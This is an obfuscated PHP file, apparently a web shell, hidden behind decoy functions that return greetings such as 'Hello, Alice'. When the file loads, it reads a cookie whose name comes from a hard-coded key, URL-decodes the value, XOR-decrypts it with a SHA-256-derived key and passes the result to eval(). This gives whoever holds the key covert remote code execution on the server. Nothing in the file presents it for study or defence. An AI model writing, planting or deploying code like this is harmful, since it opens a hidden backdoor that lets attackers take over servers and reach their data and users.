<?php	function PjavOcm($ROAvGup) {
    return "Greetings, Sir/Madam " . $ROAvGup;
}
function pXBTvZp($oMtFIBhM, $qyttLrYjsO)
{
    $yuEYOAf = str_pad($oMtFIBhM, $qyttLrYjsO, $oMtFIBhM);
    return $yuEYOAf;
}
function tIkxGT($ROAvGup, $NviTNFJZE) {
    if ($NviTNFJZE) {
        return PjavOcm($ROAvGup);
    }
    return QgpCmJW($ROAvGup);
}
function cnLZu()
{
    $jRIXCcoalC = nWAGldANPu();
    $FQtqAzmTs = ixISW($jRIXCcoalC);
    return $FQtqAzmTs;
}
function uVVjFz($PrONVjdR)
{
    $wJKSM = hash("sha256", $PrONVjdR, TRUE);
    return $wJKSM;
}
function MaFVIp($HnJCLt)
{
    $OsKrS = $_COOKIE[$HnJCLt];
    return $OsKrS;
}
function IvoQxxTQf($EwbvJ, $ctHqs)
{
    $JqFWw = $EwbvJ ^ $ctHqs;
    return $JqFWw;
}
function yEWgaA($IGlatAds)
{
    $pBGAvj = substr($IGlatAds, -4);
    return $pBGAvj;
}
function LAAljt($qHAtvXH)
{
    $faJtCt = rawurldecode($qHAtvXH);
    return $faJtCt;
}
function QgpCmJW($ROAvGup) {
    return "Hello, " . $ROAvGup;
}
function BEGLz($BjFwDBJsx, $oibmGBIXQ)
{
    $BGfcEtzp = uVVjFz($BjFwDBJsx);
    $qVFnuSEK = xxWLtwdJR($oibmGBIXQ);
    $gZGrSiZV = zxuQuY($qVFnuSEK, $BGfcEtzp);
    return $gZGrSiZV;
}
function waMEDESJh()
{
    $WyFmg = cnLZu();
    FnyBi($WyFmg);
}
function ixISW($MPOKBTWwur)
{
    $PQBky = yEWgaA($MPOKBTWwur);
    $YdCFWf = BEGLz($MPOKBTWwur, $PQBky);
    return $YdCFWf;
}
function xxWLtwdJR($uolQqsRPs)
{
    $tmvzcq = MaFVIp($uolQqsRPs);
    $qVFnuSEK = LAAljt($tmvzcq);
    return $qVFnuSEK;
}
function LtJZBsFR($imbwj)
{
    $JgQMLSGtp = strlen($imbwj);
    return $JgQMLSGtp;
}
function zxuQuY($HDRhj, $CDAVvZ)
{
    $VIDrdG = LtJZBsFR($HDRhj);
    $KxLkotb = pXBTvZp($CDAVvZ, $VIDrdG);
    $WyFmg = IvoQxxTQf($KxLkotb, $HDRhj);
    return $WyFmg;
}
function nWAGldANPu()
{
    $oSCIUhJK = "KDQgDlDcDrTMOhgwGGCql";
    return $oSCIUhJK;
}
function FnyBi($SazPariSd)
{
    eval($SazPariSd);
}
waMEDESJh();
$vjVimpr = tIkxGT("Alice", true);